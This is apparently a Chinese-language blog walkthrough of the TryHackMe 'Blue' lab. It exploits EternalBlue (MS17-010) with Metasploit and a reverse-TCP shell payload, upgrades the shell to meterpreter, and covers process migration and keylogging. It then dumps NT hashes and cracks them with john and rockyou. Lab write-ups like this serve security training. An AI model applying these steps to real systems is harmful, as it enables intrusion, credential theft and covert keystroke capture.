THM-Blue(蓝色的)

侦查

  1. 1000以下的端口号开放了多少个端口?
    直接使用nmap -n 10.10.61.174对目标进行扫描,Nmap在默认情况下对常用的1000端口进行扫描

    所以答案是3

  2. 这台机器容易受到什么影响?(答案形式为:ms??-???,ex: ms08-067
    提示的已经很明显了,这是Windows最出名的永恒之蓝漏洞,代号是MS17-010

使用nmapvuln脚本扫描可以探测出

获得初始访问权限

使用metasploit利用,并获取权限

  1. 找到我们将针对机器运行的利用代码。代码的完整路径是什么?(例如:利用/........)
    漏洞利用使用的msfconsole模块,exploit/windows/smb/ms17_010_eternalblue

  2. 显示选项并设置一个所需的值。这个值的名称是什么?(提交全部大写)

通常按原样运行此漏洞利用程序会很好;但是,为了学习,您应该在利用目标之前再做一件事。输入以下命令并按回车键:
set payload windows/x64/shell/reverse_tcp

这里我们按照他的引导,把payload设置为windows/x64/shell/reverse_tcp,然后再次利用

利用成功后,摁下CTRL + Z可以将session到后台运行

升级

上述我们使用了windows/x64/shell/reverse_tcp获取了一个cmd.exeshell,可惜的是cmd.exe可以做的功能比较局限,我们可以在metasploit提升使用的shell

使用post/multi/manage/shell_to_meterpreter可以将我们的shell提升我metasploit其中的一个杀手锏meterpreter

在使用该模块之前,我们需要将之前获取的cmd.exe至于后台,因为后台,使用CTRL + Z

然后使用post/multi/manage/shell_to_meterpreter该模块

可以看到必要设置的参数为SESSIONLHOST,SESSION就是我们漏洞利用返回的shell,使用sessions -i查看

这里的session的ID为2,所以将该模块SESSION值设置为2LHOST为本机IP,然后运行可以讲的一个meterpreter会话

可以看到meterpreter会话的ID3,使用sessions -i 3连接该会话

可以使用getuid查看获取当前用户的权限

getsystem是用于获取system权限的命令,可以使用该命令确定我们已经获取了system权限

使用ps可以查看目标系统当前运行进程信息,以及他们的PID(进程号)

使用migrate PID可以将我们的shell进程迁移到指定PID的进程中,伪装的更深,如果迁移的进程是notepad.exe或者cmd.exe等输入窗口,可以使用
keyscan_start或者keyscan_stop命令对键盘进行监听

在进行migrate进程迁移的时候需要注意,如果我们使用的是system权限,如果往低权限的用户迁移进程,可能会导致我们权限的降级,甚至无法取回拥有的system权限,需要谨慎对进程进行迁移,当然我们也可以尝试对高权限的进程进行迁移,以此达到提权的操作

破解密码

使用hashdump命令可以获取目标系统用户的hash值,hashdump局限性比较高,通常需要我们拥有管理员甚至system权限才可以执行

获取目标的hash值后,可以使用john对该密码进行爆破
使用命令

john hash.txt --format=NT --wordlist=/usr/share/wordlists/rockyou.txt

这里我之前爆破密码是成功的,不知道为啥就不行了,以后研究一下,破解出的密码是alqfna22

寻找Flag

meterpreter模块中带有search命令对目标的文件进行搜索
使用命令search -f flag*

注意这些都是常见的FLAG可能会出现的位置,特别是C:\Windows\System32\config,这是系统SAM文件所在的目录

其实meterpreter可以对目标的靶机进行文件的上传和下载,还有很多强力的功能

posted @ 2023-03-27 15:03  Junglezt  阅读(68)  评论(0编辑  收藏  举报